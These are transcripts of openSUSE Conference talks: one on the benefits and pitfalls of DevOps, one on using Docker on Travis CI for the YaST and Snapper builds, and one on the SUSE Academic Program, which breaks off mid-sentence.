did DevOps invent automation? Absolutely not. Not at all. But it makes good use of it. It incorporates it in part of its values and it really is important for us to figure out ways to do things in a more automated way. It makes it easier for us to do our work. It frees up our time of the monotonous to do the things that are more creative and useful and improvement oriented. Now you can't automate everything though. As much as we have people that exist that suggest or assert or preach that we're going to automate everything to the point that we don't have jobs anymore. And we had really interesting talk from Mark Seeger just a little while ago where he's talking about how there are some problems that are just complex that until we figure out how to automate it, we still have some smart, hardworking people that have to fix difficult problems that have to do some of the hard work. Automation should be employed both in Dev and in Ops. And it's reliant upon known consistent states. And as long as they're known and consistent, you should automate it. And that frees up our smart, hardworking time to anticipate those things that are unknown, that are unanticipated and work on how to solve those so that at some future time we can automate that particular aspect. In Dev we typically talk about those things in terms of unit tests and a variety of different things. And in configuration management is a particularly useful tool for Ops. What can be automated? Yeah, builds can be automated. That's probably the easiest thing. That's the most common thing that gets automated. But there's lots of automation used and deployed in our testing, both in Dev and in Ops. And automation is particularly useful for deployment of software, both in your test environment and in your production environments. And of course, all of the system administration, all of the servers that are involved, virtual and physical, should all be in some sort of automated mechanism and control management for this particular team. And as you do that, you start to remember that there are similarities in what Dev does and what Ops do, that you can kind of bring them together to do the same way. A quick thought from a manager's point of use. For someone who has managed Dev Ops operations in a variety of different circumstances, what does it take to be a successful Dev Ops organization? You got to have metrics. Manager everything. Knowledge is power. Make sure that, just like I was saying all throughout this, that the purpose of Dev Ops is to overcome the barriers of collaboration and facilitate better communication. You've got to be able to facilitate the dialogue between the members of the team. The ones that are being devs within the team, the ones that are performing the Ops responsibilities, you've got to facilitate that dialogue. Make sure that that kind of opportunity to talk is frequent. It doesn't have to be frequent, but that it can be as frequent as necessary. And that that kind of dialogue is not destructive. As a manager in a particular team, you've got to make sure that your team is collaborating constructively, and that those kinds of communications are well intended. Suddenly misunderstandings take place, but the better the trust that you have amongst the members of this team that are Dev Ops together, the better the communication will be. The activities of the team should be ordinary. Too often we have teams that rely upon the spectacular, the heroic, the staying to work through all hours of the night, the staying to work on weekends, the kind of heroics that burn people out. The more ordinary, the more routine, the more commonplace, the work that's being done in a Dev Ops organization, the more successful that organization will be at delivering value. Now there may be heroic periods of time, but make sure that they are infrequent and make sure that they are short. Another important managerial aspect to making sure that a Dev Ops organization is successful is to invest in the team, invest in the new ideas, have your team asking themselves routinely, what if? What if we did this different? What if we changed this? What if we implemented this? Ah, what if we did this instead of that? What if questions are fabulous in a successful Dev Ops organization? And as I have said and will continue to say repeatedly, trust, build an environment of trust. So we have the Dev Ops lifecycle. It starts with planning. You've got to make, oh, this is a great picture, a representation in Legos of MC Escher's staircase. I love it. It's really great. And it represents planning very well, right? It's a never-ending process. It's always going on. It's a mobius of sorts. This is something that has to happen. The team must make time to plan and don't leave out the operations part of this. Too often, the Devs get together and say, oh, well, we're the first part of the process. We don't need to involve the operations guys. We're just going to do our own planning and they'll figure it out later on or they'll inherit what it is that we have already planned. Bad news. Make sure that you are planning together to be successful in Dev Ops. Next step, execute. Create channels of opportunities to communicate. I mentioned that a little bit earlier in the manager special. Embrace risk. Let people take risks. Don't encourage recklessness, but bring in new innovations and new ideas that might not be incorporated, that might not be espoused, that might not actually be brought into what's being developed or the process, but allow innovation to take place and reward measurable improvements. Say you've got a new bit of automation. Recognize that. Inspire people through recognizing what it is that they're accomplishing while they're executing this complex process. The next step in the flow of the Dev Ops process is post-release. The next one I want to highlight is post-release. Make sure as you're having your Dev Ops team being successful that you make time for a retrospective. That's really important to reflect back upon what it is that you've done and how you got to where you are today. Don't stop with all of your automation at the end of the release. Make sure that you are automating stuff that happens post-release. The last thing I wanted to point out here is this concept of breathing. Allow the team to breathe. I'm going to poke fun at Scrum at the moment. This is my personal opinion and you will disagree. As far as Scrum is concerned and this concept of sprints, this is exhausting. You're constantly sprinting. I don't like that. Your experience may be different, but as I try to encourage successful delivery of software, software solutions with Dev Ops, yes, you want to be agile. Yes, you want to be adapting. Yes, you want to be fast. Yes, you want to get those new fixes and that new functionality out to your users efficiently and fast, but you've got to be able to have some time to step back and reflect and see the forest for the trees. The next I'll point out here is don't lose sight of the item in the flow of the process of Dev Ops of maintaining. I add to that sustaining. Be prepared as part of your planning and as part of your whole process to support and maintain the software after it is released and not just say, oh, I've released it. It's gone. I've got nothing to do with it anymore. Make sure that you're continuing to automate and make sure that you are continuing to monitor and measure what's going on with your software and the experiences that your customers are having, your users are using. I mentioned golden hammers and silver bullets. I also mentioned Game of Thrones earlier and I'm really not a big Game of Thrones guy, but I know a little bit about it. I just want to make sure that you realize that when you talk about a Dev Ops process, because I shared the silly representation of some hippies and stick it to the man, we ate process, we're going to go Dev Ops, we're going to be agile, man. That's kind of a bad, silly representation that makes fun of various aspects of it. But it's important to recognize that even though Dev Ops is intended to improve upon various ancient practices, it's still a process. As such, there are things that you need to do in that process. There are things that are important to accomplish in steps and with some clarity and with some formality. It may not be so rigid and formal as some of the other processes that you've been associated with, but it's still a process. It's not a golden hammer and it's not a silver bullet. It requires smart, caring, hardworking people and it requires management. It can't just happen organically. It has to have some kind of guidance and management and rules and process. So the Game of Thrones representation, and I'll quickly segue then to my Oedipus example instead of Game of Thrones, but it's one of the most popular shows in television land. People don't even necessarily watch it on TV. Everybody watches Game of Thrones on their devices after each episode with Netflix. In Europe, is there a Netflix equivalent or is it Netflix? You just have to be in a specific region. I have no idea. So everybody watches Game of Thrones on Netflix. Thanks very much. So there's Peter Dinklage. Sometimes people say I look like him. I'm short and fat. I had a beard last time I gave this presentation. So I really don't look like him anyway. Okay, well, and you have some of the popular characters, some of the more interesting characters, and then you have Jamie Lannister and you have Jon Snow and you have Daenerys. You've got these guys that are famous for killing people. Jon Snow, at least this was at the end of season five. You had five kills for Jamie. You have four kills for Jon Snow and five kills for Daenerys. So G.R.R. Martin makes these characters out to be heroes, desirable people, appealing in a lot of different ways, smart, organized, deliberate, capable, powerful. And what I don't like about the way in which these powerful people are represented is that they obtain power and manifest their power by killing people. And that doesn't work for me. I don't think that people that kill other people are heroes, right? And I'm not trying to, my point is not really to assassinate the character of the series and of the particular author, but it's just an interesting thought to me as I consider what it is that he is trying to represent through this series, this very popular series about how to be successful. And then that led me to think about something I'm a little more familiar with, and that's the play by Sophocles, Greek playwright of Oedipus, great Greek tragedy where Oedipus ends up killing his father, and in the end, a lot of bad things happen by the time this Greek tragedy is finished. And it's the point I'm trying to make here without making you read Oedipus and not trying to make you become an expert in Greek tragedy. But the takeaway here from this Greek tragedy is Oedipus owes everything to his progenitors, to his parents, to his father. And he only realizes how much he owes to his dad after he's already killed his dad. And so that's the fun. Dear dad, I'm really, really, really, really, really sorry. Oedipus, right? Before we try to assassinate and kill and exert our powerful devops by killing our parent, the waterfall, start to value what it is that we're building upon and what it is from waterfall that really was powerful and really is meaningful in terms of what it is that we want to accomplish in an open source environment, in an environment that's growing, in an environment that's trying to provide greater, greater, and greater value to users in an open way, in a way that changes the way people think, in a way that changes the way people see the world around, in a way that creates new thought and inspires action. And of course, we can sit back and say, well, it's only software. But the ideas and values that are summed up in open source changes the world. And improving upon that and spreading that message becomes a very valuable thing. And it becomes a very desirable thing. The hallmarks of success in a successful open source project, in a successful process, in a successful delivery of a solution that changes the way people do things, that improves the value of what it is that we do on a day-to-day basis, that lifts and edifies and makes the world a better place, has a few of these interesting hallmarks for success that are similar between both the dev and the ops, use configuration management. We know that very well from a dev perspective in terms of using things like a git and how grateful we are for git once we get past of how weird it is. And then all of the operations that take place with configuration management that's salt or ansible or any of a dozen different other solutions. These are the same thing that we can utilize together better in both the dev responsibilities and the operations responsibilities. We have to test. We need to be better about automating those tests. And we need to do it in much the same way between development and operations if we're going to be a successful dev ops approach to delivering software solutions. And make sure that you're doing it together. But you're not just saying, oh, I'm the developer, so I'm going to write unit tests. And you should have nothing to do with it. You QA and ops silly people. I don't have any reason for you to look at my unit tests. Don't do that. Share and collaborate what it is that you're trying to test and how it is that you're testing. And you'll be more successful. More automation, continuous deployment. These are all good hallmarks of a successful dev ops organization. I'm going to share just two examples with you from Suza. I have a good relationship with my friends in the SCC, the SUSE customer center who successfully use dev ops and deliver a valuable product, a valuable solution that customers and users appreciate. In the customer center team, they made a team decision. This wasn't thrust upon them by some evil overlord or poorly intended manager. The team got together and said, if we're going to be successful, we need to be closer together in both the dev and the ops. And we're going to use a dev ops approach to do that, to overcome those barriers of collaboration and to improve the kinds of communication that we have. So they chose to use scrum and the dev ops approach. They decided to minimize the specific roles of Joe, you're a developer, and Anne, you're an operator. It was Joe and Anne, we're doing dev ops together. We're going to have development responsibilities and operations responsibilities with no division between the roles. You might not choose to do that in your dev ops implementation, but that's the decision that the SCC team made and it has contributed to their success. One of the nice things about SCC is that it was basically a new project with new team members. It's perhaps harder to organize a dev ops process if you have a preexisting bit of software with preexisting teams that are already divided between development and operations. That's a little harder to just say, okay, we're going to stop doing what we've been doing for 10 years and we're going to change it all up. It's possible, but it's harder. In their case, it was easy to make this decision as a team because they said, we're new, we're not tied to anything old, we can make these kinds of decisions and we bring everybody together. They in this SCC team have fearless development. They're not afraid to make mistakes. They're not punished for making mistakes. They certainly acknowledge when they make mistakes, but they try very hard to say, okay, we messed up. That was a good try. We tried to be innovative. It fell short. We're going to put that aside and move on. They have as many as 40 developments throughout the day. They're rapidly creating new software on a daily to hourly to minute basis and they're not afraid to throw it out there. They're not afraid to deploy. I think I said developments. I meant deployments. You knew what I said, what I meant when I said it, right? They have 40 deployments in a day. They can push it out and have no fear that something's going to be broken. Something might be broken, but they don't fear the fact that something might be wrong because they know that on that 39th time that they deployed something and something was wrong, they can in a matter of minutes turn around and deploy the 40th time and get it fixed and move on, move beyond the mistakes. They're confident in their ability to be agile. Lastly, they're automating everything. Now do they automate everything? No. They're always trying to improve the number of automations and to improve the number of automations, but it's something that they value and they're constantly automating as much as they can. A second example is the open build service. That's a great example here where this team uses a scrum approach. They involve agile development and in a similar way, the people that are the operators that are in operations are the same people that are the developers. Everybody can push a deployment at any time with appropriate collaboration and approvals, but those kinds of agile details within operations match what's going on in the development aspects of the software and that the team does it together with very little delineation between your developer and your operator. Because not necessarily with the same rapid deployment that the SCC team uses as I indicated in the previous slide, their deployment is a little more deliberate, but they still can deploy as quickly as they want to, as quickly as it makes sense. They do extensive stress testing before any deployment. Then again, lots and lots and lots and lots of automation. Moreover, they have a fairly comprehensive way of rolling back. Here as I wrap things up, this is my takeaway for this OpenSUSA conference. What's my point? I don't know. What did you take away from this is entirely up to you. You get to choose if there is any value to this, but this is what I had hoped to communicate to you as I talk about the good and the bad of DevOps. DevOps is surely just like any other process. It's not a golden hammer. It doesn't solve all your problems. You can't just go in and say, oh, we've had all these other things go wrong with our delivering the software solution, so we're just going to use DevOps because it'll fix everything. It won't. But it can help you to be more successful if, I'll get to that in the next point, make sure that as you're thinking about the value of DevOps or the value of any process that you're thinking about your people and how your people work, it's easy to say, I've got a team of 10 people and they're smart developers and smart operators. I can just throw DevOps at them and that's not true. It doesn't mean that you can have a screw and use a hammer to drive the screw. If you've got a nail, it's darn near impossible to drive a nail with a screwdriver. Make sure that you pick the kinds of processes and the kinds of details that match how your people work. Now that doesn't mean that people can't change. Surely you can change. Surely you can encourage your team members to change and adopt and learn and grow. That's what we're here for. That's the whole reason that we're on this planet is to learn and to grow and become better. Your people can do the same thing. They can learn new processes. They can learn new tools. But don't force a process down the throat of this team of people just because you read that DevOps is the best thing and you believed the hype. The last point is most reliable results. Forget about what the process is, whether it's DevOps or anything else. The most reliable results that you will get will come via hardworking people, smart, dedicated people with high integrity, and the amount of trust and integrity that all of these different players have with each other and the quality of the communication that they have. So with that, I think that Open Source and Open Sousa and Linux espouse these kinds of ideals and that DevOps is a tool that can help make the software solutions better, but only because of the quality of you people and the amount of time and care that you put into what it is that is developed, whether it's software or anything else. Ask your questions. Anyone have any questions? You're all tired. You're worn out. You just want to get on. Where's the beer? I just wanted to say that I think you said one really important thing, which is breathe. And I feel like that's one of the things that everyone misses from talking about DevOps. It's kind of a panic all the time. We have to do so many things. We have to go faster and faster and faster. And my background is in games development before I started at Sousa. The only thing that matters there is performance. And the way you get performance is to slow down and look at what you're doing and identify things that you're doing that you shouldn't be doing and stop doing those things. So measure and optimize. And that's really the process you should be doing. So when I see people talking about, for example, automation and just talking about automating, we have to automate all the things all the time. Just automate. The problem is you're going to end up automating a lot of things that you shouldn't even be doing in the first place. So I feel like that's one aspect of the discussion that's no one really talks about when talking about DevOps and these kind of things. That's an excellent comment. Thank you very much for that supporting comment. Great. Thank you for your time. Thanks for coming to Open Sousa. What a great conference. And it's largely great because of the good people that put it together and you great people who come and support it and participate in these excellent, very well-intended and very world-changing projects. Thanks, everybody.
DevOps is one of the Industry's great buzz words. You've heard that DevOps (or ITOps, or WhateverOps) will solve all your development-to-deployment problems and how agile processes can increase the velocity of your projects. But you also likely know that it's not a silver bullet that solves all problems. This session will discuss how DevOps helps, what the pitfalls are, and how to avoid failure while squeezing the BEST out of DevOps.
10.5446/54484 (DOI)
My name is Adislav Slazak. I'm a member of the JAS team in Prague. In this short talk, I will tell you about Docker S traves, how we use it. The goal of this presentation is to show you that running continuous integration is not something difficult. You can use it even for small projects. I will show you some tricks we use in JAS. The first question is by traves. The obvious reason is because it's a hosted project. It's free for open source project and is nicely integrated with GitHub. That means if your project is hosted by the GitHub, you can quite easily make running your test as traves. Just some examples. This is the JAS repository at GitHub. As you can see, the visible part is this green icon, which means the traves bell is passing. If you click that icon, you will see details. You can see the full log that means what was executed on the runner, which tests were failing or not. At the end, you will see success. That's one point. The other point of GitHub integration is, for example, showing the status for each commit you have in your repository. If you look at the branches, you will see for each branch a sign. If it's a green checkmark, that bell was okay and passed. If there's a red cross, that means that the bell failed and there is some issue with that. And of course, the same tags are used in pull requests. Whenever somebody opens a pull request with some change, you can immediately see whether this change passes the continuous integration or not. We can see for every commit here, the status. The first one was not so great, so it failed, but then it was fixed. Right now, we know that all checks have passed and we can match the code into the master and we know that it won't break anything. It will still work. The package will be still building. So let's talk about some details of the Travis builds. Internally, the workers are running in Ubuntu, batch machines, either precise or trusty, but both of them are pretty old. The precise is actually discontinued and not supported anymore. So the question is, what if you need a newer compiler, newer libraries, and what if you need completely different distribution because your software is not meant to be run on Ubuntu. And another issue is that you can't easily debug the build because, for example, if the build fails, what to do? You need to somehow check what was wrong and it would be nice to somehow see either remotely, so you could, for example, SSH, or you could reproduce the issue locally, but both are not possible with Travis. So why Docker? The Docker is the OVL solution, which should help you with the problems I just mentioned. It's supported out of box at Travis, that means you don't need to install it, configure it, and anything like that. It's just ready. You just issue the local commands and it works. Another interesting or important feature, which is nice, that it's container-based and it's really lightweight. That means there's no big overhead because, as I said, the Travis machine already runs in a virtual machine, so having one layer, one more, which will slow it down and that would not work nicely. So that's the advantage of Docker. Another advantage is that many base system images are available. So if you don't like Ubuntu, you can easily download Fedora, Debian, whatever. So you can easily, you can even easily build your own images at Docker Hub and use them for build. So that means you can enhance the base images and, yeah, let's make the build much easier. I have prepared two examples. First is Snapper. It was already mentioned in several talks here. I will just tell that it's a tool for managing file system snapshots, and it's written in C++ and it's meant to be portable. So it should work in many distributions. And the package we built in OBS is actually targeted for the BI and Ubuntu and so on. So this is the main feature here. And regarding to the source code, it's in a single git repository and the code is not changed much, much often. So this is the snapper repository and again, we have this nice service batch. So the setup is that every build runs in several Docker or virtual images, but we run Docker. So in the end, we can run each build in a different target system. So we currently built like for five different distributions. That means every commit or pull request opens to snapper, where we built against Thumbelete, Leap, Fedora, Ubuntu and Debian. And we know before merging this pull request that all these distributions that the package for all these distribution will still work. So how it's done? We have separated Docker files for each target distribution and specific script for that. And the Docker images are built at Travis in parallel. We define a belt matrix and this belt matrix allows running each build in a separate virtual machine with a different Docker image. So we have this main Travis YAML file which defines the distributions. And different Docker files for each each belt. So you define, you use these Docker files like this one for Thumbelete. We basically based on the publicly available Thumbelete image. And additionally we run zipper and install the packages we need. Then the main work is done by this Travis script. Again for each target distribution we have a separate one. So for example for Thumbelete we run some, we build a package, at the end we install it and run even on the snapper minus minus version. That means we verify that the install package still works. So in this case the Docker images are directly built at Travis. That means it's easier for us to maintain but it takes some more time. But because the snapper is not change much time, much often it doesn't matter. The second example is Siaz which is much more complicated because it's not portable, it's targeted just for open SUSE distributions and has modular design. It means currently we have over 100 git repositories, we have bigger development team and there are more frequent changes. That means we need to somehow cope with the fact that the builds are much often started and we need to somehow make sure that they are faster. So to make it faster we pre-built Docker images at Docker Hub. So we have special image designed for Ruby, we have second image which is designed for C++ because mainly we have two groups of YAS packages, either they are written in Ruby or some of them are written in C++ and to have separate set of packages for each group we have separate Docker image. And this Docker image contains a common script which is used in all modules. That means at Travis we usually just call just one single script which handles all modules. That means the script has to be a bit flexible like not all modules support Rubocop so we need to check whether the module uses it, whether the module uses Makefiles or newer Rakefiles. Some legacy modules are not converted to Rakefiles so we have to be more flexible here. Then we run the test and so on. So again, build package and try installing it. And to ensure that the Docker image is always fresh because we built against factory we need to ensure that the factory changes are in the Docker image and that the Docker image contains the YAS packages. We have a simple Jenkins jobs which just triggers rebuild of the image at the Docker hub. So every like two hours we tell Docker hub to rebuild the image so we have fresh packages and we are sure that we are running against the latest versions. So the original set up was we built Ubuntu packages but that didn't work well because well it was extra work, it was hard to maintain and it was not much reliable because the Ubuntu system has some different system defaults or sometimes we forget to add new file into that Ubuntu packages. So either we got false positives or we missed some bugs because for example we could not build Rpn packages in Ubuntu easily so we skipped this. So if there was a bug in the spec file this old Ubuntu setup could not found it. With the new setup as I said we built two Docker images and the Travis script is shared so it's much easier for maintenance. We don't need to care about the Ubuntu there, we just run the Tumblevite Docker image and yeah that's it. So the summary is that now we have more reliable builds because we are building really in Tumblevite not in Ubuntu or something else. It's much easier for two debuggers because you can download the Docker image locally, you can run the same commands which are run in the Docker image at Travis and you can see what's happening there and yeah quite easily find out what's wrong. And finally we are not dependent on the default system at Travis because for example that Ubuntu 12.0 will be dropped soon and we have to do something about it otherwise our Travis will not work for us so we have to switch to something newer and switching to newer Ubuntu would not help much so we decided to switch to Docker which makes us independent on the Travis default. So any questions? Yes? How long does it usually take when you submit a pull request for all the tests to finish? It depends on the package but usually every package is built in like in say five minutes because it depends how many tests are there, how big the package is. If it's a simple just module which has just few files then it's a matter of say minutes. Snapper for example that should go quickly right? Yeah that's like in five minutes. Thanks. As you can see it's usually about five minutes but depends on the worker. So here it's almost eight but usually it's about five. And as I said these belts are running parallel so actually the real time was much smaller than the sum of this time. So usually when Travis is not loaded all this belt in parallel so in five minutes you'll get the results for five distributions. Okay any more questions? So I put some links which will be part of the other slides which I'll upload or you can contact us at the just mailing list or IRC channel at V-Note. Thank you. Thank you.
Do you work on an open source project? Is your source code hosted at GitHub? Do you use continuous integration or continuous deployment? Why NOT? This short talk will be about some tricks we use in the YaST team for continuous integration. Because we need a specific environment we use the Docker containers for building and testing at Travis. This approach also decreased out maintenance effort and made the builds more reliable. Hopefully this talk encourages you to use continuous integration also for your projects.
10.5446/54486 (DOI)
Hello. Welcome everybody here at the gallery. I'm trying to get the nice atmosphere here. The temperature is quite okay I guess, so I invited a few more people. My name is Emil Broek. I am working for SUSE and I'm going to tell you about the new SUSE Academic Program. So if you have any questions during the talk please jump in at any time. So what will I talk about in the next hour? I'll try to keep it under an hour. I'll first explain who am I and why am I standing here. Second, I will talk about why SUSE came up with an academic program. After that we'll talk through the academic program, the new SUSE Academic Program. What does it mean? What does it contain? The different levels that are built into the new program and at the end I've got a real call for action for all of you. So please stick to there. And then Q&A at the end, but as I said please interrupt at any time. So why me? I've been working now for SUSE for two years and I am responsible and getting paid to have hello somebody is waving. Do you want me to stay over there? Oh, okay. So oh, I have to stay in this box. All right, I'll try. So professionally I'm working for SUSE and I'm responsible for the commercial training program. I'm managing all the training partners in Europe, Middle East and Africa and that is quite successful. And at that time when I started with managing and setting up a program to get as many people as possible trained in SUSE, we realized that we were forgetting the students, but it was just a matter of we can do only one thing at a time. So now two years later the whole commercial program for commercial training institutes is working quite well in Europe, Middle East and Africa. So now it is time to come up with an academic program coming from the corporate company SUSE. My background, as I said I'm working for two years for SUSE, but before that I worked for ten years for a Linux consultancy and training company in the Netherlands and I am the founder of LPI together with other open source ambassadors in the Netherlands and Belgium. So I've been working on getting students to work with Linux for many years. And as I said, now the comedian came into my life and I'm quite active on social media. So if you'd like to say something about this talk then look at hashtag GEEKO on tour. I'm active on the most platforms so if you want to have anything to share please do so and looking forward to your feedback. So now to the academic program. I have been trying to get universities of Appliance Science, different IT schools to work with Linux and open source in general for many years. And when I started about 12 years ago now I was quite shouting in the desert. It was just me and when I was talking to many universities of Appliance Science it was quite often that there was not much response because at that time the classes were just dominated by proprietary software solutions and at that time there were some reasons why it should be focused on the proprietary solutions but the world has changed. And when you're going to a lobby try to get people, enthusiasts, IT instructors to be enthusiastic about training in Linux, training in open source. It is important that you make differentiation what you focus on. Last year at this conference I did a talk on many recommendations how you can get your school to work with Linux and open source and one of the recommendations I had is make sure that you are clear what you're talking about. In this case I tried to be clear the SUSE Academic Program that's been released fits very well to the curriculum. So what are the IT teachers training and also on operations. The desktop is not that dominant in the academic program. You can use it but actually yesterday here I learned that there is sort of open SUSE Academic Program being set up but that's very early stage so I expect you will hear more about that in the next months and probably next year here at SUSE at Open SUSE Conf there will be a talk on the open SUSE Academic Program but now we focus on operations and on curriculum. It's quite difficult for me to stay inside this box. Do I really have to stay? Can I not do? No. Oh, I'm told to be here. So why is it important? Why is it important to have an academic program at all? Why is that important? It's important that the schools are bringing people to the labor market that actually fits the profile. So if you look at open source technology a couple of years ago we did an investigation, a true survey in the Netherlands and we investigated how was the connection between the number of open source people finishing university compared to the demand in the labor market. And what we found there is what we've defined as the open generation gap. So the open generation gap is the difference between what the labor market wants compared to the number of students finishing in the technology of Linux and when I say Linux I am talking about more wider than just Linux because I think open source technology in totally is important but that's the open generation gap and the open generation gap was there in the Netherlands and because I've been working for LPI which is a global organization I'm quite happy to say that it was a worldwide challenge at that time. Anybody in the room here today who is an IT teacher? Yes. Yes, one of a couple IT teachers. All right. And you're obviously because you hear you're training Linux to students. Computer science. Okay. The Linux and open source methodologies, yes. All right. Excellent, excellent. And you've been doing that for many, many years? For three years. Three years, okay. And why is it now since three years that you're now training into Linux technology and before that? No one else was doing it before. But there was a demand. There is a misunderstood demand. The students don't know, they only know what their teachers tell them and the existing faculty, like you said, there was a generation gap, they've grown up in a different non-open source environment so they don't know how to teach it. And so there needs to be a bridge that comes across there and I'm trying to help bridge that gap. Fantastic. Keep on the good work. And we might have something for you, for your students. So that's the academic program in total and that's for Linux independent technology. So whatever distribution, as long as it's Linux, I'm fine with that. But as I'm working for SUSE and I think Open SUSE and SLES are fantastic distributions, if you have to teach students Linux, why not do it in SUSE technology? Anybody another argument for not doing it in SUSE technology? Well, if you would have asked me three years ago, I would have said I don't really mind if it's SUSE or any of the other distributions. I think Debian, to be honest, is quite an important distribution as well. So yeah, I like SUSE a lot and I love the Gecko. I travel around with him anywhere or her. It's actually not known if it's him or her. But it is important that different distributions are being taught as long as the market demands several, I say that distribution knowledge, so knowledge in a different distribution, why not have the University of Appliance Science also teaching the different technologies. Anybody disagree with me? Please do so. No? Okay, so we all like SUSE and we all like and understand that other distributions are important as well. Okay. Now, SUSE came with an academic program. Anybody an idea why SUSE is interested in coming up with an academic program? Potential employees? Yeah, absolutely. That's a very good reason actually because we've got more than 100 vacancies at the moment at SUSE. So, if you're into SUSE technology and you like to work for us, have a look at the jobs we have. So, absolutely, for our own reason to have more people knowing about SUSE. So, they will probably easier apply for a job with us. So, absolutely. Another reason? Lowest barriers to market. Can you explain a little bit who was saying that because I'm looking into a lamp? Oh, over there. Hey, Doug. Yeah, it basically gets people knowledgeable of open source in early age and of course as they go in and they become managers or things of that nature, they're familiar with it. It's just, it's a knowledge aspect and it has potential economic benefit to SUSE. Yeah, absolutely. So, that's why SUSE came up with an academic program. And here we are. So, what you see is the academic program. What does it focus on? It focuses on getting trained as an instructor and teaching SUSE technology, developing on SUSE and using SUSE. Those three elements are the elements that are now into the academic program of SUSE involved. When I say SUSE technology, I'm not just talking about SLES. As you probably have seen here at the conference and you already know, but many people still understand and still see SUSE as just a Linux company. But our technologies that we focus on, the open source technologies are more spread than just SLES. So, also the academic program focuses on storage, cloud, SUSE manager and of course still SLES. And when you're going to train students and teachers, first the teachers and then students, at least that's the way you should go. In SUSE technology, there is certification available as well. So, it's not just the training and it's not just getting the students up to the right level of knowledge. There is even possibility, if you are a university, to test this knowledge by using the same certification model as is being used in the commercial SUSE industry. So, we've got a certification overview. At the bottom, you've got the administrator level and on top of that engineer level and if you have gathered a whole bunch of the certifications below, you can become an architect in SUSE. But it starts with certification and then all the four technologies I just mentioned, you can get administrator level certification and on top of that engineer level certification. Any people certified in any of the SUSE technologies here? Somebody in the back there? Yes? Great. Only one person? That's something we have to get up then. We have to get up that people that are using SUSE technology that they are certified in as well and that's where actually one of the goals of a SUSE academic program as well to get more people certified. So, let's do a little bit of a recap. As I said two years ago when I started with SUSE, there was no academic program. So when people came to me and asked, can I use the training material that SUSE has developed for the commercial market? Can I use it for my students? The answer was no. Unfortunately, it was not possible and not allowed. So we had to come with an academic program. And before that, there were of course universities and different technical education, non-profit education that we had as a customer base. And we had different models for them but we kept on supporting that model but we didn't welcome any new universities anymore at that time. And now we have our academic program with everybody can join in. So if we look at the academic program of SUSE, as I said, it focuses on the two elements, the element of the operations. That's just software that the school uses for their infrastructure and the curriculum. How is it built up? Here is the slide again. So it's about getting trained, the instructors, getting trained, the students. If you like to develop further on the technology, that's built in the model as well. And of course, we like to, the software to be used by the students. So what does it look like? There is three layers. And the first layer, it's totally out of cost. So there is no fee, there is no minimum order. There are not many demands other than you have to be a university. So if you want to become part of our SUSE academic program, everybody can become a part of our program as long as you're a non-profit educational institute. Can you read this? Is this all, no, it's too small, right? So I'll do a little bit of fruit picking here. If you sign up to this level of the program, you will get free access to all the training material we have available. And you will get a campus license to use SUSE. We will even make certification available, and that's being developed right now for the commercial institutes. If somebody in the labor market wants to become certified, the cost for an exam to become SUSE certified are between 150 and 195 US dollars per exam. For the academic institutions, we are developing right now a bulk model, which will be a lot, a lot cheaper. We are really trying to get the boundary to become certified. If you are a SUSE student and you're like SUSE and you want to do the exam, it's very easy to become certified and also very cheap. Free access to the SDK as well. So the software development kit is part of this first layer as well. I think that's the most important things out of the first layer. Then there is a second layer, and that's actually when you're going to talk about the software that the university are using yourself. So if a university is already using SUSE, they can use it. If they want to use a lot of technologies and a lot of products of us, compared to the commercial market, there is a very, very low entry and a cheap model where you still can get all the services and all the support that a commercial company gets as well. There is a third layer, if you really want to go deep into the technology as a university, it's not about teaching, this is about using the software for your own environment, your own infrastructure. So that's the three layer model that the SUSE academic program consists of. Is that clear, any questions on the three steps model? Okay, then I'll move on. This is even more detail about the new academic program. In the description of this talk, I promised to give detail about academic programs, so I will. But I will glance over it. So if we look here at the first pillar, the education, there is training material and certification available for all teachers, but compared to the commercial model, it's not, you don't have to be certified as an instructor before you teach it. So we made it again as low-boundary as possible, but on the other end, it's not mandatory, but I do recommend that as an instructor, you look at the certification and you try the exams before you go and teach it, but it's not mandatory. It's all focused on getting as many people as possible trained in SUSE. So there will be a specific material, there is specific material which is only to use for non-profit and non-commercial institutions, and it will be clearly signed as material for this market, and of course it's not allowed to use the material outside these non-commercial institutes, because we've got a commercial training program where actually the goal is not to make money for SUSE, so we're not making money on the training material. What we do is we try to get as many people as possible trained in the technology. So again, there is no commercial, but we do have commercial training partners, not as ourselves, but training partners like here in Germany. One of the training partners that pops up in my mind is B1. I've seen many people from B1 here as well. They are a training partner here in Germany, and that's a commercial training partner. Besides the training material just on paper, there is also on-demand training material available for the academic institutions. So if you want to get your knowledge up to level, there are different possibilities to get there. So the second pillar, that's a lot about if you're using SUSE technology in your infrastructure. The third is more if you want to use the tools. So the software development kit, and if you really want to go deep into the technology, you might like to be interested if you're really teaching high-level technology in your students, then this pillar is interesting because we deliver a lot of possibilities that are normally only offered for commercial institutions and now also available for academic institutions. And then we are setting up an academic program. And one of the first things in September, 25th till 29th of September, in Prague, there will be the SUSE-COM. I don't know if any of the open SUSE people know about that, but we've got a big conference coming up and that's quite big fun, I must say, fun, very informative, from technical talks to informative talks. Great examples of where the technology has been used with customers of SUSE. And I can say out of my own experience, visiting now two SUSE-COMs that it's really something great to go through. And also if you're in structure and you want to take students to Prague, it's a great possibility and there is high discount offered for universities, academic institutions that are part of an academic program. If you want to know exact discount on the tickets and everything, please come to me afterwards. I'll explain how the model works. But all is meant that we have a lot of university and a lot of young people coming to SUSE-COM. So here's a promised call to action. It's quite easy actually, the call to action. Because it's just go to the website www.SUSE.COM. You just subscribe there and if you want to become part of the academic program and you're recognized as a non-commercial institute so you fulfill the requirements, then literally immediately you are part of a program and you can benefit from the benefits. Once you are allowed into the program, you will have access to a special portal. It's built by SUSE and this portal will give you access to the on-demand training I talked about. It will give you access to all sorts of things, how you can get your knowledge up to speed, how the certification work, all explanation about further details of the program. Then I've got the Raspberry Pi here. I actually took one with me. We've got ARM here and a Raspberry Pi. I think that and it's totally out of the academic program of SUSE actually. But when I've been looking at the market for universities to be able to train SUSE, I think the Raspberry Pi with SUSE because it's now all available without cost for a year to run less on the Raspberry Pi. Does anybody of you agree with me that it can be a great step forward to teach SUSE technologies using a Raspberry Pi? Wow, a lot of yes. Can you explain? Yeah. So I'll quickly repeat otherwise they have to run up with the microphone. It's very easy. That's basically what you said. The explanation we got, it was launched at SUSE in Washington last year. How they explained it and I liked it quite a lot. It was done by Aaron Quill, one of our high technology architects. Probably has another function name but he's quite a good guy. He had a picture of himself working on a machine in 19 something long ago and he was working on that machine at home when he was about 12 year old. When he was working on that machine and he came into the real world where information technology was being used, he found that what he learned on that machine he had at home wasn't really useful to him. But if we were able to close the gap between the machine that you use at 